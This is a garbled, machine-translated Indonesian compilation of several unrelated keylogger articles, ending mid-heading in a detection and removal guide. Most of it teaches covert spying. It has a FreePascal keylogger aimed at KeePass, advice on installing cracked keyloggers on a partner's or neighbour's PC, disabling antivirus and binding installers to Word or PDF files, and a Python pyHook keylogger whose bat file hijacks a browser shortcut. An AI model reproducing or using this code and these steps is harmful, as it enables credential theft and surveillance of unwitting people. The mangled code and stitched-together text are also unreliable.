Untuk memeriksa keamanan kata sandi yang dimasukkan melalui KeePass, saya memutuskan untuk menulis keylogger sederhana dengan pengambilan data tambahan dari clipboard. Seluruh kode mengambil beberapa baris di FreePascal.
Kata sandi, tanpa langkah keamanan tambahan dan konfigurasi KeePass yang tepat, ternyata cukup rentan.
Kode keylogger ditempatkan dalam loop Timer, yang diperbarui setiap 10 ms. Modul yang digunakan: Windows dan ClipBrd.
//Bandingkan keadaan kunci saat ini untuk f:= 0 hingga 255 lakukan jika a[f]<>GetAsyncKeyState(f) lalu mulai //Reaksi menekan tombol jika KeePass.Checked dan (GetAsyncKeyState(f) = 0) lalu Memo1.Caption:= Memo1.Caption + chr(f);<>//Reaksi terhadap penekanan tombol jika bukan KeePass.Checked dan (GetAsyncKeyState(f)<>0) lalu Memo1.Caption:= Memo1.Caption + chr(f);
akhir; //Simpan status kunci saat ini ke dalam array untuk f:= 0 hingga 255 do a[f] := GetAsyncKeyState(f);
//Tulis kapan perubahan dilakukan pada clipboard jika s
Clipboard.AsText lalu mulai s:= Clipboard.AsText;
Memo2.Caption:= Memo2.Caption + s + " ";
akhir;
Program Simple Logger terlihat seperti ini:Jendela -Keyboard- menampilkan tombol tanpa memperhatikan huruf besar/kecil dan bahasa input. Simbol yang nomornya sama dengan kode kunci ditampilkan: chr(f). Program dapat dimodifikasi untuk menampilkan semua simbol dengan benar, tetapi hal ini tidak diperlukan untuk penelitian ini.
Menyalin ke jendela -Clipboard- terjadi ketika isi buffer berubah.
Kelemahan KeePass dan penghapusannya
Simple Logger merespons perubahan clipboard 100 kali per detik. Jadi, memasukkan kata sandi ke dalam buffer dan kemudian menghapusnya setelah beberapa detik tidak memberikan perlindungan dalam kasus ini.Untuk mengatasi masalah ini, Anda dapat menggunakan AutoDial.
3. Panggilan otomatis
Respons terhadap panggilan otomatis KeePass terjadi dengan menekan sebuah tombol, bukan menekannya. Ini memungkinkan Anda mendapatkan perlindungan dari beberapa keylogger. Untuk menyiasatinya, Simple Logger memiliki pengaturan tambahan: “KeePass Auto-Type”. Jika diaktifkan, logger akan terpicu saat tombol ditekan.Saat melakukan panggilan otomatis melalui KeePass: NamaLogin Saya Kata Sandi Panjang123
Sebuah entri akan muncul di Simple Logger:
Simple Logger tidak memperhitungkan pintasan keyboard dengan cara apa pun. Seperti yang Anda lihat, tombol Shift ditampilkan sebagai karakter khusus (mirip dengan “+”) dan “?”. Shift dilepaskan sebelum dan sesudah huruf kapital. Namun, ini cukup untuk memahami kata sandinya.
Untuk mengatasi masalah ini, Anda dapat menggunakan pengaturan “Kompleksitas panggilan otomatis ganda” di KeePass. Dalam hal ini, KeePass akan memasukkan sebagian kata sandi dari keyboard dan sebagian melalui clipboard, mengacak nilainya. Ini memungkinkan Anda melewati beberapa keylogger.
Simple Logger akan bereaksi terhadap komplikasi ganda dari autodialing sebagai berikut:
- Tempel dari clipboard "Ctrl + V" ditampilkan sebagai "V◄?";
- Panah kiri – “%” (kode kunci dan simbol #37);
- Panah kanan – “"” (kode kunci dan simbol #39).
Tindakan perlindungan tambahan dapat membantu melawan keylogger yang dirancang untuk KeePass.
4. Perlindungan tambahan
Beberapa paket perangkat lunak memiliki fitur seperti:- Perlindungan input data dari keyboard perangkat keras;
- Peramban yang aman.
Saat menggunakan browser yang dilindungi, tidak mungkin mengakses clipboard dan keyboard menggunakan Simple Logger. Selain itu, tidak ada cara untuk mengambil tangkapan layar.
Alih-alih sebuah kesimpulan
Setelah melihat bagaimana karyawan kami menggunakan KeePass, saya menemukan beberapa:- jangan gunakan UAC;
- jangan gunakan autodialer, cukup salin kata sandi melalui buffer;
- membiarkan program tetap terbuka saat meninggalkan tempat kerja;
- gunakan pengaturan default tanpa mengonfigurasi kebijakan keamanan.
Saya menguji versi terbaru KeePass 2.36 pada Windows 8.1. Agar adil, perlu dicatat bahwa masalah ini bukan hanya masalah KeePass saja. Ada banyak penyimpan kata sandi lain dengan tingkat keandalan yang lebih besar atau lebih kecil, tetapi ini adalah topik untuk studi lain.
Tautan
- Pencatat Sederhana di GitHub
//Siapa yang peduli, Anda dapat menemukan file exe di arsip “SimpleLogger_for_Win64.7z”. Program ini tidak mengizinkan keylogging penuh; program ini dimaksudkan untuk penelitian keamanan dan tujuan informasi.
Pengaya peramban
Seperti yang dicatat oleh pengguna dartraiden, modul ini dapat digunakan KeepPassHttp bersama dengan add-on browser PassIFox atau ChromeIPass. Plugin ini (menurut pengembangnya) menyediakan paparan data KeePass yang aman melalui HTTP.Kombinasi ini memungkinkan Anda untuk secara otomatis mengisi login dan kata sandi Anda di browser ketika KeePass tidak terkunci. Simple Logger tidak bereaksi dengan cara apa pun dalam kasus ini.
Titik lemah ChromeIPass adalah pembuatan kata sandi baru, karena... itu disalin melalui clipboard dan terlihat di layar. Dalam hal ini, lebih baik membuat kata sandi baru di KeePass itu sendiri.
Membuat kata sandi utama baru
Seperti dicatat oleh arthur_veber:Saat mengganti kata sandi utama, serta saat membuat yang baru, mode aman tidak digunakan.
Dalam hal ini, Simple Logger menyadap kata sandi utama yang dimasukkan ke KeePass.
Keyboard virtual di layar dari pabrikan terkenal juga tidak membantu, yang, seperti autodialer KeePass, bekerja berdasarkan peristiwa penekanan tombol.
Sulit untuk memberi nasihat di sini. Kami mungkin perlu menarik perhatian pengembang terhadap masalah ini.
Cara serangan lainnya
Seperti yang pertama kali ditunjukkan oleh pengguna qw1, jika sistem tempat KeePass diinstal disusupi, maka cara serangan lain selain keylogger dapat digunakan. Dalam hal ini, daftar tindakan untuk melawan serangan akan bergantung pada situasi spesifik.Sayangnya, tidak mungkin untuk mencakup dalam satu artikel semua langkah keamanan yang diperlukan untuk menyimpan kata sandi.
Siapa di antara kita yang tidak ingin merasa menjadi peretas hebat setidaknya sekali dan merusak setidaknya sesuatu? :) Meskipun tidak, mari kita bahas betapa menyenangkannya mendapatkan kata sandi dari email/jejaring sosial Anda. jaringan teman, istri/suami, teman sekamar berpikir setidaknya sekali, semuanya. :) Ya, dan Anda harus memulainya dari suatu tempat! Sebagian besar serangan (peretasan) melibatkan infeksi komputer korban dengan apa yang disebut keylogger (spyware).
Jadi, dalam artikel hari ini kita akan membahas tentang apa itu program gratis untuk memonitor komputer berbasis windows, di mana Anda dapat mengunduh versi lengkapnya, cara menginfeksi komputer korban, dan apa saja fitur penggunaannya.
Tapi pertama-tama, sedikit perkenalan.
Apa itu keylogger dan mengapa dibutuhkan?
Saya pikir Anda sendiri sudah menebak apa itu. Biasanya, ini adalah sejenis program yang diinstal secara tersembunyi (walaupun hal ini tidak selalu terjadi) di komputer korban, setelah itu ia mencatat semua penekanan tombol pada node ini. Selain itu, selain klik itu sendiri, hal-hal berikut biasanya dicatat: tanggal dan waktu klik (tindakan) dan program di mana tindakan tersebut dilakukan (browser, termasuk alamat situs web (hore, kita langsung lihat apa kata sandinya) untuk!); layanan sistem aplikasi lokal (termasuk kata sandi login Windows), dll.).
Dari sini salah satu masalahnya langsung terlihat: Saya mendapat akses ke komputer tetangga saya selama beberapa menit dan saya ingin mendapatkan kata sandinya dari VK! Saya menginstal program ajaib dan mengembalikan komputer. Bagaimana cara mencari kata sandi nanti? Mencari cara untuk mengambil komputer darinya lagi? Kabar baiknya adalah: biasanya tidak. Kebanyakan keylogger tidak hanya mampu menyimpan seluruh akumulasi basis data tindakan secara lokal, tetapi juga mengirimkannya dari jarak jauh. Ada banyak opsi untuk mengirim log:
- Email tetap (mungkin ada beberapa) adalah pilihan yang paling nyaman;
- Server FTP (siapa yang memilikinya);
- Server SMB (eksotis, dan tidak terlalu nyaman).
- Flash drive tetap (Anda memasukkannya ke port USB komputer korban, dan semua log disalin ke sana secara otomatis dalam mode tak terlihat!).
Mengapa semua ini diperlukan? Saya pikir jawabannya sudah jelas. Selain pencurian kata sandi yang dangkal, beberapa keylogger dapat melakukan sejumlah hal baik lainnya:
- Mencatat korespondensi di jejaring sosial tertentu. jaringan atau pesan instan (misalnya, Skype).
- Mengambil tangkapan layar layar.
- Melihat/menangkap data webcam (yang bisa sangat menarik).
Bagaimana cara menggunakan keylogger?
Dan ini adalah pertanyaan yang sulit. Anda perlu memahami bahwa menemukan keylogger yang nyaman, fungsional, dan bagus saja tidak cukup.
Jadi, apa yang diperlukan agar program mata-mata dapat bekerja dengan sukses?:
- Akses administrator ke komputer jarak jauh.
Selain itu, hal ini tidak berarti akses fisik. Anda dapat dengan mudah mengaksesnya melalui RDP (Remote Desktop Service); Penampil Tim; AmmyAdmin, dll.
Biasanya, kesulitan terbesar terkait dengan hal ini. Namun, baru-baru ini saya menulis artikel tentang cara mendapatkan hak administrator di Windows. - Email / ftp anonim (yang tidak dapat Anda identifikasi).
Tentu saja, jika Anda melanggar Bibi Shura demi tetangga Anda, poin ini dapat diabaikan dengan aman. Seperti halnya jika Anda selalu memiliki komputer korban (ala, cari tahu kata sandi saudara laki-laki/perempuan Anda). - Kurangnya antivirus / sistem perlindungan internal Windows yang berfungsi.
Kebanyakan keylogger publik (yang akan dibahas di bawah) diketahui oleh sebagian besar perangkat lunak antivirus (walaupun ada virus logger yang terpasang di kernel OS atau driver sistem, dan antivirus tidak dapat lagi mendeteksi atau menghancurkannya, meskipun mereka memilikinya. mendeteksinya). Karena hal di atas, perangkat lunak anti-virus, jika ada, harus dimusnahkan tanpa ampun. Selain antivirus, sistem seperti Windows Defender (pertama kali muncul di Windows 7 dan seterusnya) juga menimbulkan bahaya bagi spyware kami. Mereka mendeteksi aktivitas mencurigakan pada perangkat lunak yang berjalan di komputer. Anda dapat dengan mudah menemukan informasi tentang cara menghilangkannya di Google.
Ini mungkin semua syarat-syarat yang diperlukan dan cukup untuk keberhasilan Anda dalam mencuri kata sandi / korespondensi / foto orang lain atau apa pun yang ingin Anda langgar.
Jenis spyware apa saja yang ada dan di mana saya dapat mengunduhnya?
Jadi, mari kita mulai dengan tinjauan keylogger utama yang saya gunakan dalam praktik sehari-hari dengan tautan ke unduhan gratis versi lengkapnya (yaitu, semua versi adalah yang terbaru saat ini (yang memungkinkan untuk menemukan obatnya) dan dengan retakan yang sudah berfungsi dan diuji).
0. Tikus!
Peringkat (dari 10):
- Siluman: 10
- Kenyamanan/kegunaan: 9
- Fungsionalitas: 8
Itu hanya bom, bukan keylogger! Dalam kondisi kerja dibutuhkan 15-20 KB. Mengapa terkejut: ini seluruhnya ditulis dalam bahasa assembly (programmer veteran menitikkan air mata) dan sebagian besar ditulis oleh peretas yang antusias, karena tingkat kerahasiaannya sungguh luar biasa: ia bekerja pada tingkat kernel OS!
Selain itu, paket ini mencakup FileConnector - program mini yang memungkinkan Anda menghubungkan keylogger ini dengan program apa pun. Hasilnya, Anda mendapatkan exe baru dengan ukuran yang hampir sama, dan ketika diluncurkan, ia berfungsi persis seperti program yang Anda rekatkan! Namun setelah peluncuran pertama, keylogger Anda akan otomatis terinstal dalam mode tak terlihat dengan parameter pengiriman log yang telah Anda tentukan sebelumnya. Nyaman, bukan?
Peluang bagus untuk rekayasa sosial (membawakan file game/presentasi ke teman di flash drive, atau bahkan hanya dokumen Word (Saya akan memberi tahu Anda cara membuat file exe yang meluncurkan file Word/Excel tertentu di salah satu dari artikel saya berikutnya), luncurkan, semuanya baik-baik saja dan luar biasa, tetapi teman tersebut sudah terinfeksi tanpa terlihat!). Atau Anda cukup mengirimkan file ini ke teman melalui surat (sebaiknya tautan untuk mendownloadnya, karena server email modern melarang pengiriman file exe). Tentu saja, risiko dari antivirus saat instalasi masih ada (tetapi tidak akan ada setelah instalasi).
Omong-omong, dengan bantuan beberapa teknik lain, Anda dapat merekatkan distribusi instalasi tersembunyi apa pun (ini ditemukan di keylogger The Rat! dan Elite) tidak hanya dengan file exe (yang masih menimbulkan kecurigaan di kalangan pengguna yang kurang lebih mahir), tetapi juga dengan file word/excel dan bahkan pdf biasa! Tak seorang pun akan memikirkan apa pun tentang pdf sederhana, tetapi bukan itu masalahnya! :) Bagaimana hal ini dilakukan adalah topik dari artikel terpisah. Mereka yang sangat bersemangat dapat menulis pertanyaan kepada saya melalui formulir umpan balik. ;)
Secara keseluruhan, Tikus! dapat dijelaskan dalam waktu yang sangat lama dan banyak. Ini dilakukan jauh lebih baik daripada saya. Ada juga link downloadnya disana.
1. Keylogger elit
Peringkat (dari 10):
- Siluman: 10
- Kenyamanan/kegunaan: 9
- Fungsionalitas: 8
Mungkin salah satu keylogger terbaik yang pernah dibuat. Kemampuannya, selain set standar (intersepsi semua klik dalam konteks aplikasi / windows / situs), termasuk intersepsi pesan instan, gambar dari webcam, dan juga - yang SANGAT penting! - intersepsi kata sandi layanan WinLogon. Dengan kata lain, ia menyadap kata sandi masuk Windows (termasuk kata sandi domain!). Hal ini dimungkinkan berkat kerjanya pada tingkat driver sistem dan peluncurannya bahkan pada tahap boot OS. Karena fitur yang sama, program ini tetap tidak terlihat oleh Kasperosky dan semua perangkat lunak anti-malware lainnya. Sejujurnya, saya belum pernah menemukan satu pun keylogger yang mampu melakukan hal ini.
Namun, Anda tidak boleh terlalu menipu diri sendiri. Penginstalnya sendiri sangat mudah dikenali oleh antivirus dan untuk menginstalnya Anda memerlukan hak administrator dan menonaktifkan semua layanan antivirus. Setelah instalasi, semuanya akan berfungsi dengan sempurna.
Selain itu, fitur yang dijelaskan (bekerja pada tingkat kernel OS) memperkenalkan persyaratan untuk versi OS tempat keylogger akan bekerja. Versi 5-5.3 (tautannya diberikan di bawah) mendukung semuanya hingga dan termasuk Windows 7. Win 8/10, serta keluarga server Windows (2003/2008/2012) tidak lagi didukung. Ada versi 6, yang berfungsi sempurna, termasuk. pada win 8 dan 10, namun saat ini tidak mungkin menemukan versi yang retak. Ini mungkin akan muncul di masa depan. Sementara itu, Anda dapat mendownload Elite keylogger 5.3 dari link di atas.
Tidak ada mode operasi jaringan, oleh karena itu tidak cocok untuk digunakan oleh pemberi kerja (untuk memantau komputer karyawannya) atau sekelompok orang.
Poin penting adalah kemampuan untuk membuat distribusi instalasi dengan pengaturan yang telah ditentukan sebelumnya (misalnya, dengan alamat email tertentu yang mana log perlu dikirim). Pada saat yang sama, pada akhirnya Anda mendapatkan kit distribusi yang, ketika diluncurkan, sama sekali tidak menampilkan peringatan atau jendela apa pun, dan setelah instalasi bahkan dapat rusak sendiri (jika Anda mencentang opsi yang sesuai).
Beberapa tangkapan layar versi 5 (untuk menunjukkan betapa indah dan nyamannya semuanya):
2. Keylogger lengkap.
Peringkat (dari 10):
- Siluman: 3
- Kenyamanan/kegunaan: 9
- Fungsionalitas: 8
Ini juga merupakan hal yang sangat, sangat nyaman. Fungsionalitasnya cukup setingkat dengan keylogger Elite. Segalanya menjadi lebih buruk dengan kerahasiaan. Kata sandi Winlogon tidak lagi dicegat, ini bukan driver, dan tidak dibangun ke dalam kernel. Namun, itu diinstal di sistem dan direktori AppData tersembunyi, yang tidak mudah diakses oleh pengguna yang tidak berwenang (bukan mereka yang atas nama instalasinya). Namun demikian, antivirus cepat atau lambat akan berhasil melakukan hal ini, sehingga hal ini tidak terlalu dapat diandalkan dan aman bila digunakan, misalnya, di tempat kerja untuk memata-matai atasan Anda sendiri. ;) Menempelkannya pada sesuatu atau mengenkripsi kode untuk menyembunyikannya dari antivirus tidak akan berhasil.
Bekerja pada versi Win OS apa pun (yang bagus dan praktis).
Selebihnya, semuanya baik-baik saja: mencatat semuanya (kecuali kata sandi login Windows), mengirimkannya ke mana saja (termasuk email, ftp, flash drive tetap). Dari segi kenyamanan, semuanya juga luar biasa.
3. Agen Mata-Mata Spytech.
Peringkat (dari 10):
- Siluman: 4
- Kenyamanan/kegunaan: 8
- Fungsionalitas: 10
Juga keylogger yang bagus, meski dengan kerahasiaan yang meragukan. Versi OS yang didukung juga semuanya dimungkinkan. Fungsionalitasnya mirip dengan opsi sebelumnya. Ada fungsi penghancuran diri yang menarik setelah jangka waktu tertentu (atau setelah mencapai tanggal yang telah ditentukan).
Selain itu, dimungkinkan untuk merekam video dari webcam dan suara dari mikrofon, yang juga bisa sangat populer dan tidak dimiliki oleh dua perwakilan sebelumnya.
Ada mode operasi jaringan, yang nyaman untuk memantau seluruh jaringan komputer. Omong-omong, StaffCop memilikinya (tidak termasuk dalam ulasan karena tidak berguna untuk satu pengguna - individu). Mungkin program ini ideal bagi pemberi kerja untuk memata-matai karyawannya (meskipun para pemimpin di bidang ini tanpa syarat adalah StaffCop dan LanAgent - jika Anda adalah badan hukum, pastikan untuk melihat ke arah mereka). Atau untuk melacak anak Anda yang suka duduk dan menonton “situs dewasa”. Itu. di mana yang dibutuhkan bukanlah penyembunyian, namun kenyamanan (termasuk sekumpulan laporan log yang indah, dll.) dan fungsionalitas untuk memblokir situs/program tertentu (SpyAgent juga memilikinya).
4. Monitor Pribadi Spyrix.
Peringkat (dari 10):
- Siluman: 4
- Kenyamanan/kegunaan: 6
- Fungsionalitas: 10
Fungsionalitasnya setingkat dengan kandidat sebelumnya, tetapi masalah kerahasiaannya sama. Selain itu, fungsinya mencakup hal yang menarik: menyalin file dari drive USB yang dimasukkan ke komputer, serta melihat log dari jarak jauh melalui akun web di situs web Spyrix (tetapi kami akan mengunduh versi crack, jadi tidak akan bekerja untuk kami).
5. Monitor Pribadi Spyrix.
Peringkat (dari 10):
- Siluman: 3
- Kenyamanan/kegunaan: 6
- Fungsionalitas: 8
Saya tidak akan menjelaskannya secara detail, karena... contoh ini tidak memiliki apa pun yang tidak dimiliki oleh salah satu mata-mata sebelumnya, namun, seseorang mungkin menyukai keylogger ini (setidaknya untuk antarmukanya).
Apa yang kita dapatkan pada akhirnya?
Masalah penggunaan keylogger lebih bersifat etis daripada teknis, dan ini sangat bergantung pada tujuan Anda.
Jika Anda seorang majikan yang ingin mengontrol karyawannya, jangan ragu untuk mendirikan StaffCop, dapatkan izin tertulis dari semua karyawan untuk tindakan tersebut (jika tidak, Anda mungkin akan dikenakan biaya serius untuk hal-hal seperti itu) dan pekerjaan sudah siap. Padahal saya pribadi mengetahui cara yang lebih efektif untuk meningkatkan kinerja karyawan saya.
Jika Anda seorang spesialis TI pemula yang hanya ingin merasakan bagaimana rasanya menghancurkan seseorang - dan cara kerjanya secara umum, bekali diri Anda dengan metode rekayasa sosial dan lakukan tes pada teman Anda, menggunakan salah satu contoh yang diberikan. Namun perlu diingat: terdeteksinya aktivitas semacam itu oleh para korban tidak berkontribusi pada persahabatan dan umur panjang. ;) Dan Anda sebaiknya tidak mengujinya di tempat kerja Anda. Tandai kata-kata saya: Saya punya pengalaman dengan ini. ;)
Jika tujuan Anda adalah memata-matai teman, suami, tetangga, atau mungkin Anda melakukannya secara rutin dan demi uang, pikirkan baik-baik apakah itu sepadan. Lagi pula, cepat atau lambat mereka akan tertarik. Dan itu tidak sepadan: “menggeledah cucian kotor orang lain bukanlah kesenangan yang menyenangkan.” Jika Anda masih memerlukannya (atau mungkin Anda bekerja di bidang investigasi kejahatan komputer dan tugas-tugas tersebut merupakan bagian dari tanggung jawab profesional Anda), maka hanya ada dua pilihan: Tikus! dan Keylogger Elit. Dalam mode distribusi instalasi tersembunyi, direkatkan dengan word / excel / pdf. Dan lebih baik, jika memungkinkan, dienkripsi dengan kriptor baru. Hanya dengan cara ini kami dapat menjamin aktivitas yang lebih aman dan kesuksesan yang nyata.
Namun bagaimanapun juga, perlu diingat bahwa penggunaan keylogger yang kompeten hanyalah salah satu penghubung kecil dalam mencapai tujuan (termasuk bahkan serangan sederhana). Anda tidak selalu memiliki hak admin, Anda tidak selalu memiliki akses fisik, dan tidak semua pengguna akan membuka, membaca, dan terlebih lagi mengunduh lampiran/tautan Anda (halo rekayasa sosial), antivirus tidak akan selalu dinonaktifkan /keylogger/cryptor Anda tidak selalu tidak diketahui oleh mereka. Semua ini dan banyak masalah yang tak terhitung dapat diselesaikan, namun solusinya adalah topik dari serangkaian artikel terpisah.
Singkatnya, Anda baru saja mulai terjun ke dunia keamanan informasi yang kompleks, berbahaya, namun sangat menarik. :)
Sungguh-sungguh,Lysyak A.S.
Halo, QUAZAR hadir lagi. Hari ini saya akan menunjukkan cara membuat keylogger sederhana dengan Python. Tentu saja, keylogger ini tidak dapat bersaing dengan raksasa seperti itu, namun meskipun demikian, keylogger ini dapat digunakan.
Apa itu keylogger?
Anda dapat membaca secara detail tentang apa itu keylogger dan tentang jenis-jenis keylogger di artikel ““. Untuk menemukan materi tambahan tentang topik tersebut, gunakan pencarian situs, yang terletak di sudut kanan atas. Masukkan saja kata "keylogger" atau "keylogger".
Keylogger sederhana dengan Python
Untuk membuat keylogger kita membutuhkan:
- Sistem operasi: Windows atau MacOs (Linux apa pun juga bisa digunakan, tapi saya pribadi belum mencobanya)
- Python diinstal pada mesin target, serta perpustakaan khusus.
Materi ini hanya untuk tujuan informasi. Informasi yang disajikan dalam artikel ini disediakan untuk tujuan informasi saja. Baik editor situs www.site maupun penulis publikasi tidak bertanggung jawab atas segala kerugian yang disebabkan oleh materi dalam artikel ini.
Membuat keylogger sederhana dengan Python
Pertama, Anda perlu mengunduh dan menginstal Python.
Keylogger sederhana dengan Python Setelah menginstal Python, Anda perlu menginstal modul "pyHook" dan "pywin32". Di situs ini Anda akan menemukan versi 32 dan 64 bit untuk Windows dan OS lainnya. Unduh "PYhook" dan "pyWin32" sesuai dengan versi Python dan Windows yang Anda instal (32bit atau 64bit).
Keylogger dengan Python. Modul PYhook 
Keylogger dengan Python. modul pyWin32 Setelah diunduh, instal dan buka menu IDLE (Python GUI) dari menu Start.
Keylogger sederhana dengan Python Buka menu "File" dan klik item "File Baru". Lalu pastekan kode keyloggernya:
#Nama: QUAZAR
#Situs Web: www.situs
impor pyHook, pythoncom, sys, logging
file_log = "C:keyloggerlog.txt"
def OnKeyboardEvent(acara):
logging.basicConfig(nama file=file_log, level=logging.DEBUG, format="%(pesan)s")
chr(acara.Ascii)
logging.log(10,chr(event.Ascii))
kembali Benar
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()
Dan simpan dengan memanggil file Keylogger.pyw. Hanya saja, jangan menyimpan file di direktori root C: di mana Anda memerlukan hak administrator untuk menyalin dan menghapus file. Buat folder baru di drive C: atau lokasi lain di mana Anda tidak memerlukan hak administrator untuk menyalin file dan menyimpan Keylogger.pyw di sana.
Anda dapat memilih lokasi mana pun sebagai file laporan keluaran “file_log = “C:keyloggerlog.txt”, tetapi lebih baik, tentu saja, beberapa lokasi tersembunyi di hard drive Anda. Dalam contoh ini, saya akan menyimpan file laporan ke disk di direktori root C:. Lagi pula, tidak ada yang saya sembunyikan.
Peluncuran otomatis keylogger dengan Python
Keyloggernya sudah siap. Sekarang kita perlu memastikan bahwa keylogger mulai tersembunyi dari pengguna dan secara otomatis saat Windows melakukan booting. Hal ini dapat diterapkan dengan berbagai cara. Mari kita coba melakukannya menggunakan file bat dengan menghubungkan peluncuran keylogger ke beberapa program atau dengan mendaftarkannya di startup.
Pertama, buat file bat. Salin dan tempel kode berikut ke Notepad:
::Nama: QUAZAR
::Situs web: www.situs
@gema mati
mulai "" "C:keyloggerkeylogger.pyw"
mulai "" "C:Program FilesOperalauncher.exe"
Di baris pertama Anda harus memasukkan jalur ke file keylogger.pyw (dalam kasus saya “C:keylogger.pyw”). Di baris kedua, Anda harus memasukkan jalur ke program yang biasa digunakan pengguna (dalam kasus saya, browser Opera).
Setelah mengedit, simpan file dengan ekstensi .bat (dalam kasus saya logger.bat) di beberapa lokasi tersembunyi di komputer Anda (dalam kasus saya di “C:keylogger.bat”).
Sekarang buka desktop dan pilih pintasan untuk program yang sering digunakan (dalam kasus saya, ini adalah browser Opera). Klik kanan mouse untuk memanggil menu konteks dan pergi ke properti pintasan. Di bidang “Objek”, masukkan jalur ke file bat keylogger “C:keyloggerlogger.bat”.
Setelah melakukan perubahan, ikon pintasan juga akan berubah. Tapi ini bisa dengan mudah diselesaikan di tab properti (lihat gambar di atas).
Elite Keylogger mencatat semua kata sandi yang diketik di komputer, namun tetap tidak terlihat oleh pengguna! Anda akan dapat mencegat kata sandi, dokumen, email, pesan obrolan, dan banyak lagi.
Kata sandi
Elite Keylogger bekerja dalam mode driver tingkat rendah dan dimulai sebelum sistem Windows, yang memungkinkan Anda mengetahui kata sandi dan login. Harap dicatat bahwa versi Mac tidak dapat mencatat kata sandi login OS X.
Merekam obrolan dan surat
Elite Keylogger untuk Windows mencatat obrolan dan pesan instan dari banyak klien berbeda, termasuk MSN, AOL, ICQ, AIM, GTalk, Skype. Elite Keylogger untuk Mac dapat merekam percakapan dari Skype, Viber, iChat/Messages dan Adium, serta email keluar, di kedua sisi.
keylogger jaringan
Elite Keylogger adalah solusi ideal untuk pemantauan komputer jarak jauh. Anda hanya perlu menginstalnya sekali - dan laporan akan dikirimkan kepada Anda melalui email atau diunggah ke server FTP. Hal ini menjadikan utilitas ini ideal untuk perusahaan yang memerlukan pemantauan komputer karyawan. Aplikasi ini sama sekali tidak terlihat dan tidak dapat dideteksi oleh software antivirus atau antispyware (jika diinstal dengan benar).
Intersepsi situs web terbaik
Elite Keylogger adalah salah satu program spyware terbaik karena kemampuannya mencatat kunjungan situs web untuk SEMUA browser populer. Ini sepenuhnya menangkap alamat situs web di Internet Explorer, Firefox, Safari, Opera, Google Chrome dan browser lainnya. Setiap alamat situs web dicatat, bersama dengan stempel waktu kunjungan, sehingga Anda dapat dengan mudah memantau aktivitas internet anak-anak Anda untuk memastikan mereka aman.
Antarmuka yang ramah
Sangat mudah digunakan. Pemasangannya cepat dan tidak menimbulkan rasa sakit bahkan untuk pemula. Bagi yang membutuhkannya, Elite Keylogger menyediakan opsi lebih lanjut seperti instalasi jarak jauh atau pra-konfigurasi. Cukup instal dan Anda dapat mengonfigurasi dan mengaktifkannya dalam hitungan menit. Cukup tunjukkan bagaimana Anda ingin menerima log - dan Anda bahkan tidak perlu lagi menyentuh antarmuka administrator spyware, karena sekarang ia akan melakukan semuanya secara otomatis!
Banyak pilihan untuk mengirim laporan
Elite Keylogger menyediakan banyak pilihan pelaporan. Mereka dapat dikirimkan kepada Anda melalui email, diunggah ke FTP, ditransfer ke komputer lain di jaringan lokal, atau disalin secara diam-diam ke drive USB. Tidak ada batasan ukuran log yang dimaksudkan untuk transmisi.
Ada berbagai macam trik yang digunakan hacker untuk mencuri identitas kita.
Keylogger adalah salah satu aplikasi atau alat jahat yang digunakan oleh banyak peretas untuk melacak apa yang kita ketik dan untuk siapa serta bagaimana kita terhubung ke jaringan. Keylogger telah menjadi salah satu ancaman paling kuat saat ini yang dapat merekam apa yang Anda ketik dan membaginya dengan peretas.
Mengetahui cara mendeteksi keylogger dan menghapusnya dari komputer Anda dapat membantu melindungi identitas dan privasi Anda.
Panduan langkah demi langkah untuk mendeteksi Keylogger dan menghapusnya dari komputer Anda
Tidak mudah untuk mendeteksi apakah komputer Anda terkena keylogger kecuali panduan ini mengidentifikasinya. Tentu saja, ada alat dan perangkat lunak untuk mendeteksi ancaman berbahaya, mengetahui cara mendeteksinya secara manual dapat berguna untuk melindungi identitas Anda.
Berikut adalah dua cara untuk mendeteksi apakah keylogger diinstal pada perangkat Anda atau tidak:
Metode 1. Buka Task Manager menggunakan kombinasi tombol Ctrl + Alt + Delete. Buka opsi proses dan cari salinan duplikat dari proses bernama Winlogon. Satu proses dengan nama ini boleh saja, tetapi jika ada dua proses, berarti perangkat Anda terinfeksi keylogger.
Metode 2: Terkadang keylogger menginfeksi perangkat melalui beberapa malware yang secara otomatis terinstal di perangkat Anda saat kita online. Mencari program yang tidak diinginkan di Panel Kontrol mungkin menampilkan keylogger. Berikut cara mendeteksi program yang tidak diinginkan dari Control Panel:
Buka menu Start, pilih All Programs, dan lihat semua program yang diinstal. Jika Anda menemukan program apa pun yang tidak Anda instal, hapus instalannya. Setelah menghapus program yang tidak perlu, Anda perlu me-restart perangkat Anda.
Bagaimana cara menghapus Keylogger
Setelah Anda mengetahui cara mendeteksi keylogger, Anda harus mengetahui cara menghapusnya dari komputer Anda. Pengunci kunci dapat dilepas dari perangkat menggunakan dua metode berikut:
Metode 1. Jika Anda menemukan keylogger di task manager, hapus salinan duplikat Winlogon.
Metode 2. Jika Anda menemukan program tidak dikenal terinstal di sistem Anda, hapus instalan program tersebut.
Keduanya adalah cara termudah untuk mendeteksi dan menghapus keylogger secara manual dari sistem Anda. Metode manual meletakkan dasar untuk melindungi komputer Anda dari aktivitas jahat dan dengan demikian membantu mencegah pencurian data apa pun.
Ada juga perangkat lunak yang tersedia di pasaran yang dapat membantu Anda mendeteksi keylogger dan menghapusnya dari komputer Anda. Anda dapat mempelajari cara mendeteksi keylogger dan menghapusnya dari komputer Anda dengan menginstal perangkat lunak yang dapat mendeteksi dan menghapus alat berbahaya tersebut.
Perangkat lunak ini memindai komputer Anda untuk mencari file berbahaya apa pun yang mampu mencuri informasi yang tersimpan di dalamnya dan mengirimkannya ke peretas.
Ketika file berbahaya terdeteksi, perangkat lunak akan mengkarantina dan memprosesnya, menghapus atau memulihkannya setelah tim Anda melakukan pencarian.
Perangkat lunak ini tidak hanya memindai komputer, tetapi juga mencegah atau melindungi komputer dengan menonaktifkan instalasi otomatis program apa pun yang mungkin berisiko.
Keylogger telah menjadi ancaman besar seiring semakin banyaknya orang yang menggunakan gadget digital untuk berbagai tugas. Baik itu transaksi online atau obrolan pribadi, keylogger dapat meretas detailnya dan merekam semua yang Anda ketik menggunakan keyboard perangkat kami.
Dua jenis keylogger dan pengaruhnya terhadap komputer Anda.
Keylogger memiliki dua jenis: keylogger perangkat keras dan keylogger perangkat lunak.
Perangkat Keras Keylogger:
